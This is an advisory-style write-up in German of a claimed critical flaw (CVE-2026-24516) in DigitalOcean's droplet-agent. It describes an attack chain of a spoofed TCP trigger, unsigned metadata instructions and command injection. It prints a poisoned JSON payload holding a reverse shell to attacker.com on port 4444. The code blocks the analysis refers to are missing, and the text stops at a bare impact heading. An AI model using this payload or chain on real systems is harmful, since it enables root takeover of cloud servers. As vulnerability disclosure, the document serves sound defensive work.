
Technische Analyse und PoC für CVE-2026-24516: Unauthentifizierte Root-Remote-Code-Ausführung im DigitalOcean Droplet Agent (CVSS 10.0).
ID: CVE-2026-24516
TITEL: Unauthentifizierte Root-RCE über Metadata-Poisoning & Side-Channel
SCHWEREGRAD: Kritisch (CVSS v3.1: 10.0 / AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)
FORSCHER: Anmol Singh Rajput (@poxsky)
BETROFFEN: DigitalOcean Droplet Agent (droplet-agent) <= v1.3.2
================================================================================
Der 'droplet-agent' ist ein privilegierter System-Daemon (UID 0), der für Remote-Telemetrie und Diagnose entwickelt wurde. Er unterhält einen passiven Überwachungszustand, bis eine spezifische Signalisierungssequenz empfangen wird. Die Kernschwachstelle liegt im "Impliziten Vertrauensmodell" des link-lokalen Metadata-Dienstes (169.254.169.254), dem kryptografische Integritätsprüfungen fehlen.
A. PASSIVER TCP-SIDE-CHANNEL (DIE SIGNALISIERUNGSSCHICHT) Der Agent verwendet einen Raw-Socket-Listener (internal/metadata/watcher/ssh_watcher.go) auf Port 22. Er führt einen Zustandsübergang von IDLE zu ACTIVE basierend auf hartkodierten Magic-Konstanten im TCP-Header durch:
Analyse: Dies erzeugt einen deterministischen Auslöser. Ein externer Angreifer kann die Infrastruktur-Kontrollschicht impersonieren, indem er ein einzelnes TCP-SYN-Paket mit diesen Magic-Werten spoofed.
B. VERLETZUNG DER VERTRAUENSGRENZE (DER LINK-LOKALE FEHLER) Nach der Signalisierung ruft der Agent JSON-Anweisungen vom Cloud-Metadata-Endpunkt ab. Die Schwachstelle ist ein Fehlen der Authentizitätsprüfung. Der Agent behandelt die 169.254.169.254-Zone als "gehärtete vertrauenswürdige Zone" und versäumt es, Payload-Signaturen (HMAC/mTLS) zu verifizieren.
C. DIE SENKE: UNSANITISIERTE BEFEHLSEINSCHLEUSUNG Der 'TroubleshootingActioner' (internal/troubleshooting/actioner/actioner.go) enthält eine Senke, in der das 'requesting'-Array geparst wird.
IMPERSONATION: Angreifer identifiziert eine SSRF in einer gehosteten Anwendung, um Anfragen an den link-lokalen Metadata-Dienst zu proxien.
POISONING: Angreifer richtet einen bösartigen Metadata-Server ein, der Folgendes zurückgibt: {"requesting": ["command:bash -c 'bash -i >& /dev/tcp/attacker.com/4444 0>&1'"]}
DER KLOPFER: Angreifer sendet den "DODO-TTY"-TCP-Trigger an Port 22.
AUSFÜHRUNG: Der Agent ruft das vergiftete JSON ab und führt die Reverse-Shell mit EFFEKTIVER UID 0 (Root) aus.
AUSWIRKUNGSBEWERTUNG
